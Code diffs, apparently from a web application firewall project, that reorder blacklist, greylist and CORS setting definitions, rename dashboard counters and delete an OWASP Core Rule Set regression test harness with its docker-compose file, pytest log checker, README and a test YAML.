"context": "multisite",
"default": ".shodan.io .censys.io",
"help": "List of reverse DNS suffixes, separated with spaces, to block.",
"id": "blacklist-rdns",
"label": "Blacklist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_GLOBAL": {
@ -41,24 +41,6 @@
"regex": "^(yes|no)$",
"type": "check"
},
"BLACKLIST_RDNS": {
"context": "multisite",
"default": ".shodan.io .censys.io",
"help": "List of reverse DNS suffixes, separated with spaces, to block.",
"id": "blacklist-rdns",
"label": "Blacklist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to block.",
"id": "blacklist-rdns-urls",
"label": "Blacklist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_ASN": {
"context": "multisite",
"default": "",
@ -68,15 +50,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"BLACKLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to block.",
"id": "blacklist-asn-urls",
"label": "Blacklist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_USER_AGENT": {
"context": "multisite",
"default": "",
@ -86,15 +59,6 @@
"regex": "^.*$",
"type": "text"
},
"BLACKLIST_USER_AGENT_URLS": {
"context": "global",
"default": "https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list",
"help": "List of URLs, separated with spaces, containing bad User-Agent to block.",
"id": "blacklist-user-agent-urls",
"label": "Blacklist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI": {
"context": "multisite",
"default": "",
@ -104,15 +68,6 @@
"regex": "^( *(.*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing bad URI to block.",
"id": "blacklist-uri-urls",
"label": "Blacklist URI URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP": {
"context": "multisite",
"default": "",
@ -122,15 +77,6 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing IP/network to ignore in the blacklist.",
"id": "blacklist-ignore-ip-urls",
"label": "Blacklist ignore IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS": {
"context": "multisite",
"default": "",
@ -140,15 +86,6 @@
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.",
"id": "blacklist-ignore-rdns-urls",
"label": "Blacklist ignore reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN": {
"context": "multisite",
"default": "",
@ -158,15 +95,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to ignore in the blacklist.",
"id": "blacklist-ignore-asn-urls",
"label": "Blacklist ignore ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT": {
"context": "multisite",
"default": "",
@ -176,15 +104,6 @@
"regex": "^.*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist.",
"id": "blacklist-ignore-user-agent-urls",
"label": "Blacklist ignore User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_URI": {
"context": "multisite",
"default": "",
@ -194,6 +113,87 @@
"regex": "^( *(.*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IP_URLS": {
"context": "global",
"default": "https://www.dan.me.uk/torlist/?exit",
"help": "List of URLs, separated with spaces, containing bad IP/network to block.",
"id": "blacklist-ip-urls",
"label": "Blacklist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to block.",
"id": "blacklist-rdns-urls",
"label": "Blacklist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to block.",
"id": "blacklist-asn-urls",
"label": "Blacklist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_USER_AGENT_URLS": {
"context": "global",
"default": "https://raw.githubusercontent.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker/master/_generator_lists/bad-user-agents.list",
"help": "List of URLs, separated with spaces, containing bad User-Agent to block.",
"id": "blacklist-user-agent-urls",
"label": "Blacklist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_URI_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing bad URI to block.",
"id": "blacklist-uri-urls",
"label": "Blacklist URI URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing IP/network to ignore in the blacklist.",
"id": "blacklist-ignore-ip-urls",
"label": "Blacklist ignore IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to ignore in the blacklist.",
"id": "blacklist-ignore-rdns-urls",
"label": "Blacklist ignore reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to ignore in the blacklist.",
"id": "blacklist-ignore-asn-urls",
"label": "Blacklist ignore ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing User-Agent to ignore in the blacklist.",
"id": "blacklist-ignore-user-agent-urls",
"label": "Blacklist ignore User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"BLACKLIST_IGNORE_URI_URLS": {
"context": "global",
"default": "",


@ -3,11 +3,11 @@ from traceback import format_exc
def pre_render(**kwargs):
metrics = {
"counter_blacklist_url": {"value": "unknown", "title": "URL", "subtitle": "denied", "subtitle_color": "error", "svg_color": "red"},
"counter_blacklist_ip": {"value": "unknown", "title": "IP", "subtitle": "denied", "subtitle_color": "error", "svg_color": "orange"},
"counter_blacklist_rdns": {"value": "unknown", "title": "RDNS", "subtitle": "denied", "subtitle_color": "error", "svg_color": "amber"},
"counter_blacklist_asn": {"value": "unknown", "title": "ASN", "subtitle": "denied", "subtitle_color": "error", "svg_color": "emerald"},
"counter_blacklist_ua": {"value": "unknown", "title": "UA", "subtitle": "denied", "subtitle_color": "error", "svg_color": "pink"},
"counter_failed_url": {"value": "unknown", "title": "URL", "subtitle": "denied", "subtitle_color": "error", "svg_color": "red"},
"counter_failed_ip": {"value": "unknown", "title": "IP", "subtitle": "denied", "subtitle_color": "error", "svg_color": "orange"},
"counter_failed_rdns": {"value": "unknown", "title": "RDNS", "subtitle": "denied", "subtitle_color": "error", "svg_color": "amber"},
"counter_failed_asn": {"value": "unknown", "title": "ASN", "subtitle": "denied", "subtitle_color": "error", "svg_color": "emerald"},
"counter_failed_ua": {"value": "unknown", "title": "UA", "subtitle": "denied", "subtitle_color": "error", "svg_color": "pink"},
}
try:


@ -23,6 +23,33 @@
"regex": "^.*$",
"type": "text"
},
"CORS_ALLOW_METHODS": {
"context": "multisite",
"default": "GET, POST, OPTIONS",
"help": "Value of the Access-Control-Allow-Methods header.",
"id": "cors-allow-methods",
"label": "Access-Control-Allow-Methods value",
"regex": "^(\\*|(?![, ])(,? ?(GET|HEAD|POST|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH)(?!.*\\3))*)?$",
"type": "text"
},
"CORS_ALLOW_HEADERS": {
"context": "multisite",
"default": "DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range",
"help": "Value of the Access-Control-Allow-Headers header.",
"id": "cors-allow-headers",
"label": "Access-Control-Allow-Headers value",
"regex": "^(\\*|(?![, ])(,? ?([\\w\\-]+)(?!.*\\3(?!.)))*)?$",
"type": "text"
},
"CORS_ALLOW_CREDENTIALS": {
"context": "multisite",
"default": "no",
"help": "Send the Access-Control-Allow-Credentials header.",
"id": "cors-allow-credentials",
"label": "Send Access-Control-Allow-Credentials",
"regex": "^(yes|no)$",
"type": "check"
},
"CORS_EXPOSE_HEADERS": {
"context": "multisite",
"default": "Content-Length,Content-Range",
@ -71,33 +98,6 @@
"regex": "^\\d+$",
"type": "text"
},
"CORS_ALLOW_CREDENTIALS": {
"context": "multisite",
"default": "no",
"help": "Send the Access-Control-Allow-Credentials header.",
"id": "cors-allow-credentials",
"label": "Send Access-Control-Allow-Credentials",
"regex": "^(yes|no)$",
"type": "check"
},
"CORS_ALLOW_METHODS": {
"context": "multisite",
"default": "GET, POST, OPTIONS",
"help": "Value of the Access-Control-Allow-Methods header.",
"id": "cors-allow-methods",
"label": "Access-Control-Allow-Methods value",
"regex": "^(\\*|(?![, ])(,? ?(GET|HEAD|POST|PUT|DELETE|CONNECT|OPTIONS|TRACE|PATCH)(?!.*\\3))*)?$",
"type": "text"
},
"CORS_ALLOW_HEADERS": {
"context": "multisite",
"default": "DNT,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range",
"help": "Value of the Access-Control-Allow-Headers header.",
"id": "cors-allow-headers",
"label": "Access-Control-Allow-Headers value",
"regex": "^(\\*|(?![, ])(,? ?([\\w\\-]+)(?!.*\\3(?!.)))*)?$",
"type": "text"
},
"CORS_DENY_REQUEST": {
"context": "multisite",
"default": "yes",


@ -23,13 +23,13 @@
"regex": "^(?! )( *(((\\b25[0-5]|\\b2[0-4]\\d|\\b[01]?\\d\\d?)(\\.(25[0-5]|2[0-4]\\d|[01]?\\d\\d?)){3})(\\/([1-2][0-9]?|3[0-2]?|[04-9]))?|(([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]Z{0,4}){0,4}%[0-9a-zA-Z]+|::(ffff(:0{1,4})?:)?((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d)|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1?\\d)?\\d)\\.){3}(25[0-5]|(2[0-4]|1?\\d)?\\d))(\\/(12[0-8]|1[01][0-9]|[0-9][0-9]?))?)(?!.*\\D\\2([^\\d\\/]|$)) *)*$",
"type": "text"
},
"GREYLIST_IP_URLS": {
"context": "global",
"GREYLIST_RDNS": {
"context": "multisite",
"default": "",
"help": "List of URLs, separated with spaces, containing good IP/network to put into the greylist.",
"id": "greylist-ip-urls",
"label": "Greylist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"help": "List of reverse DNS suffixes, separated with spaces, to put into the greylist.",
"id": "greylist-rdns",
"label": "Greylist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"GREYLIST_RDNS_GLOBAL": {
@ -41,24 +41,6 @@
"regex": "^(yes|no)$",
"type": "check"
},
"GREYLIST_RDNS": {
"context": "multisite",
"default": "",
"help": "List of reverse DNS suffixes, separated with spaces, to put into the greylist.",
"id": "greylist-rdns",
"label": "Greylist reverse DNS",
"regex": "^( *(([^ ]+)(?!.*\\3( |$))) *)*$",
"type": "text"
},
"GREYLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.",
"id": "greylist-rdns-urls",
"label": "Greylist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_ASN": {
"context": "multisite",
"default": "",
@ -68,15 +50,6 @@
"regex": "^^( *((ASN?)?(\\d+)\\b(?!.*[SN ]\\4\\b)) *)*$",
"type": "text"
},
"GREYLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to put into the greylist.",
"id": "greylist-asn-urls",
"label": "Greylist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_USER_AGENT": {
"context": "multisite",
"default": "",
@ -86,15 +59,6 @@
"regex": "^.*$",
"type": "text"
},
"GREYLIST_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good User-Agent to put into the greylist.",
"id": "greylist-user-agent-urls",
"label": "Greylist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_URI": {
"context": "multisite",
"default": "",
@ -104,6 +68,42 @@
"regex": "^.*$",
"type": "text"
},
"GREYLIST_IP_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good IP/network to put into the greylist.",
"id": "greylist-ip-urls",
"label": "Greylist IP/network URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_RDNS_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing reverse DNS suffixes to put into the greylist.",
"id": "greylist-rdns-urls",
"label": "Greylist reverse DNS URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_ASN_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing ASN to put into the greylist.",
"id": "greylist-asn-urls",
"label": "Greylist ASN URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_USER_AGENT_URLS": {
"context": "global",
"default": "",
"help": "List of URLs, separated with spaces, containing good User-Agent to put into the greylist.",
"id": "greylist-user-agent-urls",
"label": "Greylist User-Agent URLs",
"regex": "^( *((https?:\\/\\/|file:\\/\\/\\/)[\\-\\w@:%.+~#=]+[\\-\\w\\(\\)!@:%+.~#?&\\/=$]*)(?!.*\\2(?!.)) *)*$",
"type": "text"
},
"GREYLIST_URI_URLS": {
"context": "global",
"default": "",


@ -1,72 +0,0 @@
version: '3.2'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
container_name: modsec2-apache
image: owasp/modsecurity-crs:apache
environment:
SERVERNAME: modsec2-apache
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_TMP_DIR: "/tmp"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec2-apache:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
entrypoint: ["/bin/sh", "-c", "/bin/cp /etc/modsecurity.d/owasp-crs/crs-setup.conf.example /etc/modsecurity.d/owasp-crs/crs-setup.conf && /docker-entrypoint.sh && apachectl -D FOREGROUND"]
ports:
- "80:80"
depends_on:
- backend
modsec3-nginx:
container_name: modsec3-nginx
image: owasp/modsecurity-crs:nginx
environment:
SERVERNAME: modsec3-nginx
BACKEND: http://backend
PORT: "80"
MODSEC_RULE_ENGINE: DetectionOnly
PARANOIA: 4
TZ: "${TZ}"
ERRORLOG: "/var/log/error.log"
LOGLEVEL: "info"
ACCESSLOG: "/var/log/access.log"
MODSEC_AUDIT_LOG_FORMAT: Native
MODSEC_AUDIT_LOG_TYPE: Serial
MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
MODSEC_RESP_BODY_ACCESS: "On"
MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
COMBINED_FILE_SIZES: "65535"
CRS_ENABLE_TEST_MARKER: 1
volumes:
- ./logs/modsec3-nginx:/var/log:rw
- ../rules:/opt/owasp-crs/rules:ro
- ../crs-setup.conf.example:/etc/modsecurity.d/owasp-crs/crs-setup.conf.example
command: ["nginx", "-g", "daemon off;"]
ports:
- "80:80"
depends_on:
- backend
# our test originally targeted www.example.com as backend
# and that would do real traffic, to a real site
#
backend:
image: docker.io/kennethreitz/httpbin


@ -1,149 +0,0 @@
from subprocess import TimeoutExpired
from ftw import logchecker, testrunner, http
from ftw.ruleset import Input
import pytest
import os
CRS_HEADER = 'X-CRS-Test'
def test_crs(test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = self.find_log_location(config)
self.backwards_reader = BackwardsReader(self.log_location)
self.start_marker = None
self.end_marker = None
def mark_start(self, stage_id):
self.start_marker = self.find_marker(stage_id)
def mark_end(self, stage_id):
self.end_marker = self.find_marker(stage_id)
def find_marker(self, stage_id):
stage_id_bytes = stage_id.encode('utf-8')
header_bytes = CRS_HEADER.encode('utf-8')
def try_once():
self.mark_and_flush_log(stage_id)
self.backwards_reader.reset()
return self.backwards_reader.readline() or b''
line = try_once()
while not (header_bytes in line and stage_id_bytes in line):
line = try_once()
return line
def get_logs(self):
logs = []
# At this point we're already at the end marker
for line in self.backwards_reader.readlines():
if line == self.start_marker:
break
logs.append(line.decode('utf-8'))
return logs
def mark_and_flush_log(self, header_value):
"""
Send a valid request to the server with a special header that will
generate an entry in the log. We can use this to flush the log and to
mark the output so we know where our test output is.
"""
http.HttpUA().send_request(Input(
headers={
'Host': 'localhost',
'User-Agent': 'CRS',
'Accept': '*/*',
CRS_HEADER: header_value
},
version='HTTP/1.0'))
@staticmethod
def find_log_location(config):
key = 'log_location_linux'
# First, try to find the log configuration from config.ini
if key in config:
return config[key]
else:
# Now we could check for the configuration that was passed
# on the command line. Unfortunately, we use a default, so we
# don't know whether it was *actually* on the command line.
# Let's try to find the Docker container instead.
import os.path
import subprocess
prefix = os.path.join('tests', 'logs')
log_file_name = 'error.log'
directory_name = 'modsec2-apache'
process = subprocess.Popen(
'docker ps --format "{{.Names}}"',
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
out, _ = process.communicate(timeout=10)
except TimeoutExpired:
out = ''
if b'modsec3-nginx' in out:
directory_name = 'modsec3-nginx'
return os.path.join(prefix, directory_name, log_file_name)
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)
# Adapted from http://code.activestate.com/recipes/120686-read-a-text-file-backwards/
class BackwardsReader:
def __init__(self, file, blksize=4096):
"""initialize the internal structures"""
self.file = file
# how big of a block to read from the file...
self.blksize = blksize
self.f = open(file, 'rb')
self.reset()
def readline(self):
while len(self.data) == 1 and ((self.blkcount * self.blksize) < self.size):
self.blkcount = self.blkcount + 1
line = self.data[0]
try:
self.f.seek(-self.blksize * self.blkcount, os.SEEK_END) # read from end of file
self.data = (self.f.read(self.blksize) + line).split(b'\n')
except IOError: # can't seek before the beginning of the file
self.f.seek(0)
self.data = (self.f.read(self.size - (self.blksize * (self.blkcount-1))) + line).split(b'\n')
if len(self.data) == 0:
return ""
line = self.data.pop()
return line + b'\n'
def readlines(self):
line = self.readline()
while line:
yield line
line = self.readline()
def reset(self):
# get the file size
self.size = os.stat(self.file)[6]
# how many blocks we've read
self.blkcount = 1
# if the file is smaller than the blocksize, read a block,
# otherwise, read the whole thing...
if self.size > self.blksize:
self.f.seek(-self.blksize * self.blkcount, 2) # read from end of file
self.data = self.f.read(self.blksize).split(b'\n')
# strip the last item if it's empty... a byproduct of the last line having
# a newline at the end of it
if not self.data[-1]:
self.data.pop()


@ -1,63 +0,0 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.


@ -1,5 +0,0 @@
[modsec2-apache]
log_location_linux = tests/logs/modsec2-apache/error.log
[modsec3-nginx]
log_location_linux = tests/logs/modsec3-nginx/error.log


@ -1,17 +0,0 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))


@ -1,131 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
- test_title: 911100-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
- test_title: 911100-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
